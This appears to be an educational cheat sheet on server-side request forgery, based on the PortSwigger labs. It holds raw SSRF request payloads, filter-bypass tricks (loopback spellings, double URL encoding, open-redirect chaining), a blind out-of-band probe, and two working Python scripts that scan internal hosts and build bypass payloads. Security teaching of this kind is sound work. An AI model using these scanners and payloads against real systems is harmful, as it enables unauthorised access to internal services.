Server-Side Request Forgery (SSRF)

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

💡 See labs WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF).

💡 See Bypassing URL/Domain/IP Formats.

Testing SSRF

Basic SSRF

POST /product/stock HTTP/1.0
...

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

Accessing localhost

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin

Accessing another back-end system

Send the request to the Intruder module and mark the last octet of the IP address as the payload position (for example http://192.168.0.§1§:8080/) with a numeric payload of 1 to 255. Sort the results by status code or response length: a host that answers on port 8080 stands out from the uniform error returned for closed ports or unreachable hosts.

POST /product/stock HTTP/1.1
...

stockApi=http://<PRIVATE IP>:8080
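The Intruder scan above, written as a script. This is an added example, not code from the original page or from the PortSwigger labs; it assumes a hypothetical vulnerable endpoint http://target.example/product/stock that fetches whatever URL is passed in the stockApi POST parameter. The sender is injected as a callable so the detection logic (flag hosts whose response differs from the baseline) can also be exercised offline against a fake back end.

```python
"""Scan an internal /24 for port 8080 through a vulnerable stockApi parameter.

Added example (not from the original page or the PortSwigger labs). Assumes
the hypothetical target http://target.example/product/stock, which fetches
whatever URL is given in the POST parameter "stockApi".
"""
import ipaddress
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Tuple

TARGET = "http://target.example/product/stock"  # hypothetical vulnerable endpoint

Response = Tuple[int, int]  # (HTTP status code, response body length)


def build_post_body(internal_url: str) -> bytes:
    """Encode the SSRF payload as the application expects: stockApi=<url-encoded URL>."""
    return urllib.parse.urlencode({"stockApi": internal_url}).encode()


def http_send(internal_url: str) -> Response:
    """Real sender: POST the payload and report status code and body length.
    urllib raises on 4xx/5xx, so HTTPError is caught to keep the status code."""
    req = urllib.request.Request(TARGET, data=build_post_body(internal_url), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:
        return err.code, len(err.read())


def scan_network(send: Callable[[str], Response],
                 network: str = "192.168.0.0/24",
                 port: int = 8080) -> Dict[str, Response]:
    """Request http://<ip>:<port>/ for every host in the range and return only
    the hosts whose response differs from the baseline (most common) response.
    A closed port or dead host yields the same error page every time, so a
    host that actually answers produces a different status or length."""
    results: Dict[str, Response] = {}
    for host in ipaddress.ip_network(network).hosts():
        results[str(host)] = send(f"http://{host}:{port}/")
    responses = list(results.values())
    baseline = max(set(responses), key=responses.count)
    return {ip: r for ip, r in results.items() if r != baseline}


if __name__ == "__main__":
    for ip, (status, length) in scan_network(http_send).items():
        print(f"{ip}: status {status}, {length} bytes")
```

Sending the requests sequentially keeps the scan readable; for a real engagement wrap http_send in a thread pool and add a timeout-based classification, since some back ends return the same status for a refused connection and a slow host.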

SSRF with blacklist-based input filter

Example from the lab WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF): use 127.1 (shorthand for 127.0.0.1) to bypass the filter on localhost, and double URL encoding (the Hackvertor extension does this in the payload below) to bypass the restriction on “admin”, since the filter decodes the input once and the back end decodes it a second time.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin/<@/urlencode_all><@/replace>

SSRF with filter bypass via open redirection vulnerability

Example: if the application has an Open Redirect vulnerability, point the SSRF at it so that the server follows the redirect to the internal admin interface; a filter that only allows the application’s own host sees a permitted URL.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin<@/urlencode>
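The two filter bypasses above (alternative loopback spellings plus double URL encoding, and routing through an open redirect) as a payload builder. This is an added example, not code from the original page or from the PortSwigger labs; the paths /admin and /product/nextProduct, the query parameter name path and the host 192.168.0.12 are the lab values shown on this page, and the list of loopback spellings goes beyond 127.1 to the other forms a lenient IP parser accepts.

```python
"""Build SSRF payloads that slip past naive blacklist filters.

Added example (not from the original page or the PortSwigger labs). The lab
paths and host come from the page; the extra loopback spellings are common
alternatives accepted by lenient IP parsers (which the target's resolver
accepts must be tested).
"""
import ipaddress
import urllib.parse
from typing import List


def loopback_variants() -> List[str]:
    """Alternative spellings of 127.0.0.1 that a string blacklist for
    'localhost' / '127.0.0.1' does not match."""
    n = int(ipaddress.IPv4Address("127.0.0.1"))
    return [
        "127.1",                # shorthand: missing octets are zero-filled
        str(n),                 # decimal form: 2130706433
        f"0x{n:08x}",           # hex form: 0x7f000001
        "0177.0.0.1",           # leading-zero octet parsed as octal
        "[::1]",                # IPv6 loopback
        "[::ffff:127.0.0.1]",   # IPv4-mapped IPv6
        "localhost.",           # trailing dot defeats an exact string match
    ]


def double_urlencode(word: str) -> str:
    """Percent-encode every byte, then encode the '%' signs again. The filter
    sees '%2561...' and does not match 'admin'; the back end's second decode
    restores the word. Equivalent to the page's Hackvertor tags."""
    once = "".join(f"%{b:02x}" for b in word.encode())
    return once.replace("%", "%25")


def blacklist_bypass_payload(host: str, blocked_path: str) -> str:
    """stockApi value for the blacklist lab: unusual host spelling + double-encoded path."""
    return f"http://{host}/{double_urlencode(blocked_path)}"


def open_redirect_payload(redirect_path: str, param: str, internal_url: str) -> str:
    """stockApi value pointing at the app's own open redirect, which bounces the
    server-side request to the internal target. Left unencoded here, as on the
    page; to_form_value() encodes it once for the POST body."""
    return f"{redirect_path}?currentProductId=1&{param}={internal_url}"


def to_form_value(stock_api: str) -> str:
    """URL-encode a payload for use as the stockApi form parameter value."""
    return urllib.parse.quote(stock_api, safe="")


if __name__ == "__main__":
    for host in loopback_variants():
        print("stockApi=" + to_form_value(blacklist_bypass_payload(host, "admin")))
    print("stockApi=" + to_form_value(
        open_redirect_payload("/product/nextProduct", "path", "http://192.168.0.12:8080/admin")))
```

Try the loopback variants one at a time and compare responses: the filter and the HTTP client on the back end may use different parsers, and a spelling the client rejects gives a connection error rather than the admin page.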

Blind SSRF with out-of-band detection

Try injecting the Burp Collaborator URL in the Referer HTTP header value. Check in the Burp Collaborator if a request is received.

Referer: https://<BURP COLLABORATOR ID>.oastify.com/

💡 See lab Blind SSRF with Shellshock exploitation.

  • Install the Collaborator Everywhere extension for Burp Suite.
  • Add the target to Burp Suite’s target scope, so that Collaborator Everywhere will target it.
  • Navigate the webapp.
  • In the Target tab, new issues will be created for each vulnerable URL, for example:
    • Collaborator Pingback (HTTP): Referer
    • Collaborator Pingback (HTTP): User-Agent